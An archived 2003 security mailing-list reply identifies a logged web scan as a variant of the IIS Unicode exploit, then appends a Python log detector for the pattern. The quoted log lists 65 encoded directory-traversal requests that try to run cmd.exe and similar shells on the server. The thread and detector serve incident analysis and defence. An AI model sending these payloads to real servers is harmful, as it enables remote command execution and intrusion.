In-Reply-To: <20030424234343.8177.qmailat_private>

This is a slightly modified version of the old MS IIS-Unicode exploit, see here:
http://downloads.securityfocus.com/vulnerabilities/exploits/iis-kabom.php

Reinhard Handwerker
Internet Security Systems
Atlanta, GA

>From: Mark Embrich <mark_embrichat_private>
>To: incidentsat_private
>Subject: New attack or old Vulnerability Scanner?
>
>Hello,
>
>Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
>Note that it also included: "User-Agent:.Mozilla/3.0.(compatible;.Indy.Library)...."
>For which my googling tells me that this attack/scanner is probably
>built using Borland Delphi/C++ Builder suite.
>
>I've so far received 3 of these from 2 different IP addresses.
>The first two were from a Comcast cable user.
>The last was from a Cox Communications IP.
>
>Thanks,
>Mark Embrich
>
>0. Scan TCP 80
>1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>3. GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>21. GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>23. GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>24. GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>25. GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>28. GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>29. GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>30. GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>31. GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
>33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
>34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
>35. GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>36. GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>38. GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>39. GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>40. GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>42. GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>46. GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>47. GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>48. GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>60. GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>61. GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>62. GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>63. GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
>65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
>
>----------------------------------------------------------------------------
>Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
>world's premier event for IT and network security experts. The two-day
>Training features 6 hand-on courses on May 12-13 taught by professionals.
>The two-day Briefings on May 14-15 features 24 top speakers with no vendor
>sales pitches. Deadline for the best rates is April 25. Register today to
>ensure your place. http://www.securityfocus.com/BlackHat-incidents
>----------------------------------------------------------------------------
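For checking one's own web logs against this pattern, here is an added detector (written for this archive page, not code from either poster or from the iis-kabom exploit) that decodes each request line the way the vulnerable IIS did, repeated percent-decoding followed by overlong UTF-8 folding, and reports why a line is suspicious. The sample request lines are constructed from the quoted scan with the dots of the dump replaced by spaces, and the UTF-8 folding is deliberately as lax as the scan assumes the server to be.

```python
import re
from urllib.parse import unquote_to_bytes
SHELL_TARGETS = ("cmd.exe", "root.exe", "shell.exe")
DOTDOT = re.compile(r"(^|/)\.\.(/|$)")                  # a ".." path segment
# (length, lead-byte lo, hi) for 2..6-byte UTF-8 forms; 5- and 6-byte forms were legal in 2003
UTF8_LEADS = ((2, 0xC0, 0xDF), (3, 0xE0, 0xEF), (4, 0xF0, 0xF7), (5, 0xF8, 0xFB), (6, 0xFC, 0xFD))

def fold_overlong_utf8(data: bytes) -> bytes:
    """Collapse overlong forms (%c0%af, %e0%80%af ... %fc%80%80%80%80%af) to the ASCII
    byte they hide; the scan also tries trailers like %c1%1c, so those are not validated."""
    out, i = bytearray(), 0
    while i < len(data):
        n = next((n for n, lo, hi in UTF8_LEADS if lo <= data[i] <= hi), 0)
        if n and i + n <= len(data):
            cp = data[i] & (0x7F >> n)                  # payload bits of the lead byte
            for c in data[i + 1:i + n]:                 # 6 payload bits per trailing byte
                cp = (cp << 6) | (c & 0x3F)
            if cp < 0x80:                               # overlong: ASCII in multibyte form
                out.append(cp)
                i += n
                continue
        out.append(data[i])
        i += 1
    return bytes(out)

def normalize(raw_path: str) -> str:
    data = raw_path.encode("latin-1", "replace")
    while (decoded := unquote_to_bytes(data)) != data:  # %255c -> %5c -> \ takes two rounds
        data = decoded
    return fold_overlong_utf8(data).decode("latin-1").replace("\\", "/")

def classify(request_line: str) -> tuple[str, list[str]]:
    """Return (normalized path, reasons to flag) for one 'GET <path> HTTP/1.x' line."""
    path = request_line.split()[1].split("?", 1)[0]
    norm, reasons = normalize(path), []
    if DOTDOT.search(norm):
        reasons.append("dot-dot traversal")
        if not DOTDOT.search(path.replace("\\", "/")):
            reasons.append("traversal hidden by encoding")
    if norm.lower().endswith(SHELL_TARGETS):
        reasons.append("command-shell target")
    return norm, reasons

SAMPLE = [  # constructed from the quoted scan; "." in that dump stood for a space
    "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /_vti_bin/..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /docs/caf%c3%a9.html HTTP/1.1",
]
```

Lines with a malformed trailer such as %c0%9v do not decode to a traversal, so the command-shell target check is what catches them; run `classify` over each line of an access log to see both signals.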
This archive was generated by hypermail 2b30 : Mon Apr 28 2003 - 10:32:44 PDT